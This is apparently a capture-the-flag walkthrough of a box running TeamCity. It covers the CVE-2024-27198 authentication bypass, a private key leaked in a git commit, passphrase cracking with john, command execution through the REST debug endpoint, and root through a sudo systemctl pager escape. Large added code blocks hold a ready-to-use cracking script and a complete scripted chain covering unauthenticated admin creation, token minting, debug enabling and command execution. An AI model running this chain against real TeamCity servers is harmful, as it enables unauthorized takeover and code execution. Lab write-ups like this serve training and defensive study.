Enumeration

Nmap

The initial nmap scan showed SSH, HTTP and SMTP open.


WEB Enumeration

The website was static; however, its login page redirected to teams.onlyrands.com.

01 - web

So I added teams.onlyrands.com to the /etc/hosts file.

02 - hosts

Visiting the page revealed a TeamCity 2023.05.4 instance.

03 - teams website

Exploitation

CVE-2024-27198

In JetBrains TeamCity before 2023.11.4, an authentication bypass allowed an unauthenticated attacker to perform administrative actions through the REST API, including creating users.

So I used searchsploit and found an exploit.

04 - sus

Running it created a new administrator user.

05 - exploited

Then simply logged in.

06 - logged in

Git commits

While reviewing the users' commits I found one with the message "Oops", which looked suspicious.

07 - oops

Looking at it showed that marco had accidentally committed his id_rsa private key.

08 - id_rsa

09 - id_rsa

ssh2john (crack id_rsa)

Trying to log in with the key prompted for a passphrase, so the key was encrypted.

10 - asked password

So I converted it with ssh2john and cracked the passphrase with john and rockyou.txt.

11 - cracked ssh2john
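The cracking step above, as an added example that is not part of the original writeup: the usual ssh2john/john commands are given in the comments, and the function below does the same wordlist check with ssh-keygen alone (ssh-keygen -y only succeeds when the supplied passphrase decrypts the key), which is handy on a box where john is not installed. The demo key, its passphrase "letmein" and the tiny wordlist are constructed here and stand in for marco's id_rsa and rockyou.txt.

```shell
#!/bin/sh
# Added example: wordlist attack on a passphrase-protected OpenSSH key.
# The route taken in the writeup is:
#   ssh2john id_rsa > id_rsa.hash
#   john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
#   john --show id_rsa.hash
# crack_ssh_key does the same check with ssh-keygen only:
# `ssh-keygen -y -P <pw> -f <key>` prints the public key and exits 0
# only when <pw> decrypts the private key; any other passphrase fails.
crack_ssh_key() {            # $1 = private key file, $2 = wordlist file
    key="$1"; wordlist="$2"
    while IFS= read -r pw || [ -n "$pw" ]; do
        # stdin is redirected so ssh-keygen can never prompt and can
        # never swallow wordlist lines from the loop's stdin.
        if ssh-keygen -y -P "$pw" -f "$key" </dev/null >/dev/null 2>&1; then
            printf '%s\n' "$pw"      # found: print the passphrase
            return 0
        fi
    done < "$wordlist"
    return 1                         # passphrase not in wordlist
}

# Constructed demo material (not from the box): a fresh ed25519 key
# protected with "letmein" and a four-word list standing in for rockyou.
make_demo() {
    dir=$(mktemp -d)
    ssh-keygen -q -t ed25519 -N 'letmein' -f "$dir/id_demo" -C demo
    printf '%s\n' password 123456 letmein qwerty > "$dir/words.txt"
    printf '%s\n' "$dir"
}
```

Keys in the new OpenSSH format (header "BEGIN OPENSSH PRIVATE KEY") use bcrypt-pbkdf with a configurable round count, so every guess costs tens of milliseconds even in john; only the old PEM format ("Proc-Type: 4,ENCRYPTED") is cheap to brute-force. For a real rockyou run, use john or hashcat rather than this loop.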

Then simply logged in.

12 - logged in

Local Flag

There was no local flag reachable through that SSH account. The hint revealed that CVE-2024-27198 can also be turned into command execution on the TeamCity server, so I used this exploit: https://github.com/passwa11/CVE-2024-27198-RCE

20 - exploit

Running it failed: the REST debug endpoint it relies on was disabled, so no commands could be executed.

21 - error

However, with a token for the administrator created earlier, the debug endpoint can be switched on through TeamCity's own data-directory editor:

## GET TOKEN (mzo3aj43 is the administrator created with the bypass; id:24 is its user id)
curl -X POST http://teams.onlyrands.com/app/rest/users/id:24/tokens/RPC2 -u mzo3aj43:X8UypsbuXc
export TOKEN=<TOKEN>

## ENABLE THE DEBUG ENDPOINT: write rest.debug.processes.enable=true into <data dir>/config/internal.properties
curl -X POST 'http://teams.onlyrands.com/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true' -H "Authorization: Bearer $TOKEN"
## VERIFY that the file now contains the property
curl 'http://teams.onlyrands.com/admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties' -H "Authorization: Bearer $TOKEN"

22 - error fix

With the debug endpoint enabled, the exploit could execute commands.

24 - rce
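The whole chain from this section and from the exploitation step above (bypass, admin creation, token, debug property, command execution), written out as shell functions around curl. This is an added example, not the writeup's commands and not the searchsploit or passwa11 code: the bypass request follows the public description of CVE-2024-27198 (a non-existent path such as /hax, made to end in ".jsp" through the ";.jsp" path parameter, with a jsp= parameter naming the real REST endpoint), and the final step calls the /app/rest/debug/processes endpoint that rest.debug.processes.enable unlocks. The base URL, the "hax" path, the username pentest and the user id are assumptions; the writeup's own values were mzo3aj43 and id:24.

```shell
#!/bin/sh
# Added example (not the writeup's or the PoC's code). Assumptions: $1 is
# the TeamCity base URL, the target runs on Linux with /bin/sh, and the
# user id of the created admin is read from the UI or the REST API.

# CVE-2024-27198: a request for a non-existent path is served without
# authentication when the URI ends in ".jsp" (here via the ";.jsp" path
# parameter) and a jsp= parameter names the endpoint to dispatch to.
bypass_url() {               # $1 = base URL, $2 = REST path
    printf '%s/hax?jsp=%s;.jsp' "$1" "$2"
}

# JSON body that creates the user as a global SYSTEM_ADMIN.
admin_user_json() {          # $1 = username, $2 = password
    printf '{"username":"%s","password":"%s","email":"%s@example.invalid","roles":{"role":[{"roleId":"SYSTEM_ADMIN","scope":"g"}]}}' "$1" "$2" "$1"
}

# Step 1: create the administrator with no credentials at all.
create_admin() {             # $1 = base URL, $2 = username, $3 = password
    curl -s -X POST "$(bypass_url "$1" /app/rest/users)" \
        -H 'Content-Type: application/json' \
        -d "$(admin_user_json "$2" "$3")"
}

# Step 2: mint an access token for that user (the writeup's -u step).
# The default response is XML; the token is its value="..." attribute.
get_token() {                # $1 = base URL, $2 = user:password, $3 = user id
    curl -s -X POST "$1/app/rest/users/id:$3/tokens/RPC2" -u "$2" \
        | sed -n 's/.*value="\([^"]*\)".*/\1/p'
}

# Step 3: enable the REST debug endpoint by writing the internal property
# (the same dataDir.html request the writeup uses).
enable_debug() {             # $1 = base URL, $2 = token
    curl -s -X POST "$1/admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true" \
        -H "Authorization: Bearer $2"
}

# Step 4: run a command. The endpoint reads exePath/params from the query
# string, so -G puts the encoded data in the URL while -X keeps POST.
run_cmd() {                  # $1 = base URL, $2 = token, $3 = command
    curl -s -G -X POST "$1/app/rest/debug/processes" \
        --data-urlencode 'exePath=/bin/sh' \
        --data-urlencode 'params=-c' \
        --data-urlencode "params=$3" \
        -H "Authorization: Bearer $2"
}

# Typical run (user id 24 assumed, as in the writeup):
#   create_admin http://teams.onlyrands.com pentest Passw0rd
#   T=$(get_token http://teams.onlyrands.com pentest:Passw0rd 24)
#   enable_debug http://teams.onlyrands.com "$T"
#   run_cmd http://teams.onlyrands.com "$T" 'id; cat /home/*/local.txt'
```

Two things worth knowing when you use or hunt for this: the bypass leaves an obvious trace in the access log (requests to 404-able paths carrying a jsp= parameter and a ";.jsp" suffix), and the commands run as the account the TeamCity server itself runs under, which is why the local flag was reachable here but marco's SSH session gave nothing.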

I then read the local flag.

25 - local flag

Privilege Escalation

Mail

Running linpeas showed readable mailboxes under /var/mail. One of the messages contained a cleartext password.

32 - password

Hidden file

As matthewa, ls -la on the home directory showed an unusual file named .~ that contained a password.

33 - dach

The password was labelled for a user "Dach", whom I did not know; /etc/passwd mapped that name to the account briand.

34 - 0 dach briand

sudo systemctl

briand could run systemctl through sudo without a password (NOPASSWD).

34 - briand

Running systemctl through sudo with enough output to invoke its pager and typing !sh at the pager prompt spawns a shell; because the pager is a child of the sudo process, that shell runs as root. This needs an interactive terminal, since systemctl only pages when stdout is a TTY.

35 - gg
